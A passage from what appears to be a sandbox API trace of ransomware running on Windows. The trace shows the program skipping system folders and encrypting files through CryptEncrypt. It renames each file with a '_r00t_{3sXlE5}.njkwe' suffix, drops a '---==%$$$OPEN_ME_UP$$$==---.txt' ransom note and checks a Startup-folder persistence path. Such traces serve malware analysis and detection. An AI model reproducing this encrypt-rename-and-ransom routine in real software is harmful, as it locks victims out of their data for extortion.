lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.491] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.491] CloseHandle (hObject=0x42c) returned 1 [0061.492] GetProcessHeap () returned 0xbe0000 [0061.492] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.492] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.529] GetProcessHeap () returned 0xbe0000 [0061.529] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.529] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.529] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.529] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.529] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.529] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.529] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.529] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 48 [0061.529] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.529] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.529] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.529] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.529] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.530] GetTickCount () returned 0x114fcef [0061.530] GetTickCount () returned 0x114fcef [0061.530] GetTickCount () returned 0x114fcef [0061.530] GetTickCount () returned 0x114fcef [0061.530] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.530] GetProcessHeap () returned 0xbe0000 [0061.530] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.530] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.532] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.532] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.532] GetProcessHeap () returned 0xbe0000 [0061.532] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.532] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.532] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.532] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.532] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.532] CloseHandle (hObject=0x42c) returned 1 [0061.535] GetProcessHeap () returned 0xbe0000 [0061.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.535] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.535] GetProcessHeap () returned 0xbe0000 [0061.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.535] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.535] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.535] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.535] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.535] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.535] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.535] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 49 [0061.535] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.535] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.536] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.536] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.536] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.536] GetTickCount () returned 0x114fcff [0061.536] GetTickCount () returned 0x114fcff [0061.536] GetTickCount () returned 0x114fcff [0061.536] GetTickCount () returned 0x114fcff [0061.536] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.536] GetProcessHeap () returned 0xbe0000 [0061.536] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.536] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.538] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.538] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.538] GetProcessHeap () returned 0xbe0000 [0061.538] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.538] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.538] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.538] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.539] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.539] CloseHandle (hObject=0x42c) returned 1 [0061.540] GetProcessHeap () returned 0xbe0000 [0061.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.540] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.540] GetProcessHeap () returned 0xbe0000 [0061.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.540] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.540] FindClose (in: hFindFile=0xc1a260 | out: hFindFile=0xc1a260) returned 1 [0061.540] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.540] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1044\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.542] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.543] CloseHandle (hObject=0x428) returned 1 [0061.543] GetProcessHeap () returned 0xbe0000 [0061.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.544] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1045", cAlternateFileName="")) returned 1 [0061.544] lstrcmpiW (lpString1="1045", lpString2="Windows") returned -1 [0061.544] lstrcmpiW (lpString1="1045", lpString2="$Recycle.bin") returned 1 [0061.544] lstrcmpiW (lpString1="1045", lpString2="System Volume Information") returned -1 [0061.544] lstrcmpiW (lpString1="1045", lpString2="Program Files") returned -1 [0061.544] lstrcmpiW (lpString1="1045", lpString2="Program Files (x86)") returned -1 [0061.544] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045") returned 30 [0061.544] lstrcmpW (lpString1="1045", lpString2=".") returned 1 [0061.544] lstrcmpW (lpString1="1045", lpString2="..") returned 1 [0061.544] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.544] GetProcessHeap () returned 0xbe0000 [0061.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.544] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\*") returned 32 [0061.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0061.545] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.545] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.545] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.545] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.545] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.545] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\.") returned 32 [0061.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.545] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.545] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.545] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.545] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.545] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.545] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.545] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\..") returned 33 [0061.545] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.545] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.545] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.545] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.545] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.545] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.545] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.545] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.545] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 39 [0061.545] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.545] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.545] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.545] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.545] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.546] GetTickCount () returned 0x114fcff [0061.546] GetTickCount () returned 0x114fcff [0061.546] GetTickCount () returned 0x114fcff [0061.546] GetTickCount () returned 0x114fcff [0061.546] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.546] GetProcessHeap () returned 0xbe0000 [0061.546] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.546] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xfc8, lpOverlapped=0x0) returned 1 [0061.547] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff038, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.547] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xfc8, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xfc8, lpOverlapped=0x0) returned 1 [0061.547] GetProcessHeap () returned 0xbe0000 [0061.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.547] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.547] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.548] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.548] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.548] CloseHandle (hObject=0x42c) returned 1 [0061.549] GetProcessHeap () returned 0xbe0000 [0061.549] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.549] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.551] GetProcessHeap () returned 0xbe0000 [0061.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.551] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.551] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 48 [0061.551] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.551] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.551] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.551] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.551] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.551] GetTickCount () returned 0x114fd0e [0061.551] GetTickCount () returned 0x114fd0e [0061.551] GetTickCount () returned 0x114fd0e [0061.551] GetTickCount () returned 0x114fd0e [0061.551] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.551] GetProcessHeap () returned 0xbe0000 [0061.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.551] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.554] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.554] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.554] GetProcessHeap () returned 0xbe0000 [0061.554] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, 